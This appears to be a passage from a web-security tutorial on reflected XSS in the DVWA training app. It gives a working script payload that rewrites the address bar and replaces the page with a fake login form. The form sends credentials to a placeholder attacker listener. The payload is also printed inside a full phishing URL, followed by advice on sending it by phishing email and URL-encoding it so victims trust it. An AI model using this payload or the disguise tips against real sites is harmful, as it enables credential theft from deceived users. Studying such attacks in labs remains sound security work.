In Practice

Up until this point we have seen how UI redressing can be used to change the address bar. Let's leverage that and also re-write the html page to something a little bit more fitting of a login url.

Using the script below we can change the URL to http://dvwa/login and also create a new html page for it with document.body.innerHTML.

<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><center><h2>Please login to access secure portion of our site.</h2><form action='http://SomeMaliciousListener'>Username: <input type='text'>Password: <input type='password'><input value='submit' type='submit'></form>"
</script>

That's it. We can send a Phishing email with a url that is vulnerable to a reflected XSS and include that code as our payload.

http://dvwa/vulnerabilities/xss_r/?name=<script>history.replaceState(null, null, '.
./../../login');document.body.innerHTML = "</br></br></br></br></br><center><h2>Ple
ase login to access secure portion of our site.</h2><form action='http://SomeMalici
ousListener'>Username: <input type='text'>Password: <input type='password'><input v
alue='submit' type='submit'></form>"</script>

Even though the page that is expected to load looks similar to this:

When the victim clicks the link the login page below will load:

What about site certificates? It is not a problem. The victim is still on the real site. They are just at a destination that does not really exist except for them.

Wont they notice something weird about the url? Perhaps, I do not recommend sending a url that is full of html and javascript code. URL encoding it to something like this is much more favorable.

This url looks much more 'official' most people will see this url and think:

"oh, just your typical super long url, much be official. Let me check my training. Yup goes to the domain I expect, yup certificate is valid, must be a real site. Safe to login."

I think that the long url lends itself towards being perceived as more legitimate.